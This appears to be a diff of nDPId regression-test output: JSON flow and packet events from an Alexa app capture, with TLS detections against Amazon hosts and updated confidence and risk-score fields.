+00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047050,"flow_last_seen":1490976047111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976047111,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047014,"flow_last_seen":1490976047133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976047133,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1490976047154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976047154,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwRp1AAOcGWV00XuiGrBAq2AG7snPq5wFokYQTNHASH\/4rBwAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1490976047155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976047155,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoQ4dAAEAGA3ysECrYNF7ohrJzAbuRhBM06ucBaVAQAVd1eAAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047096,"flow_last_seen":1490976047156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976047156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":641,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047050,"flow_last_seen":1490976047169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976047169,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976047096,"flow_last_seen":1490976047217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976047217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047096,"flow_last_seen":1490976047156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976047156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":641,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047050,"flow_last_seen":1490976047169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976047169,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976047096,"flow_last_seen":1490976047217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976047217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047560,"flow_last_seen":1490976047560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976047560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1490976047560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976047560,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8csJAAEAG6uOsECrYNFXR2NSbAbtgrSImAAAAAKAC\/\/+\/5AAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047563,"flow_last_seen":1490976047563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976047563,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1490976047563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976047563,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8y+FAAEAGgVWsECrYSBXOh6SfAbuD+JsFAAAAAKAC\/\/9DRwAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1490976047602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976047602,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71JuiSVznYK0iJ6AScSA47wAAAgQFtAQCCAptkKkCAPZQ5AEDAwg="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1490976047603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976047603,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0csNAAEAG6uqsECrYNFXR2NSbAbtgrSInoklc6IAQAVfXgQAAAQEICgD2UOhtkKkC"}
-00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047560,"flow_last_seen":1490976047610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1490976047610,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047560,"flow_last_seen":1490976047610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1490976047610,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1490976047629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976047629,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwJsxAAOcGf3ZIFc6HrBAq2AG7pJ+6tUVgg\/ibBnASH\/6xFgAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1490976047631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976047631,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoy+JAAEAGgWisECrYSBXOh6SfAbuD+JsGurVFYVAQAVf7hwAA"}
-00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047563,"flow_last_seen":1490976047631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976047631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00874{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976047560,"flow_last_seen":1490976047664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1490976047664,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":704,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047563,"flow_last_seen":1490976047695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976047695,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047563,"flow_last_seen":1490976047631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976047631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976047560,"flow_last_seen":1490976047664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1490976047664,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":704,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047563,"flow_last_seen":1490976047695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976047695,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047858,"flow_last_seen":1490976047858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976047858,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1490976047858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976047858,"pkt":"AMDKkaPvePiC0\/vCCABFAAA84nJAAEAGasSsECrYSBXOh6SgAbtFc7NzAAAAAKAC\/\/9pQAAAAgQFtAQCCAoA9lEBAAAAAAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1490976047907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976047907,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwsPFAAOcG9VBIFc6HrBAq2AG7pKCmhnFJRXOzdHASH\/6\/cgAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1490976047908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976047908,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo4nNAAEAGatesECrYSBXOh6SgAbtFc7N0poZxSlAQAVcJ5AAA"}
-00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
 00364{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1490976048620,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"}
 00173{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976054009,"flow_last_seen":1490976054009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976054009,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1490976054009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976054009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L1JAAEAGF52sECrYNF7ohrJ3AbtDNXw1AAAAAKAC\/\/+MNwAAAgQFtAQCCAoA9lNnAAAAAAEDAwg="}
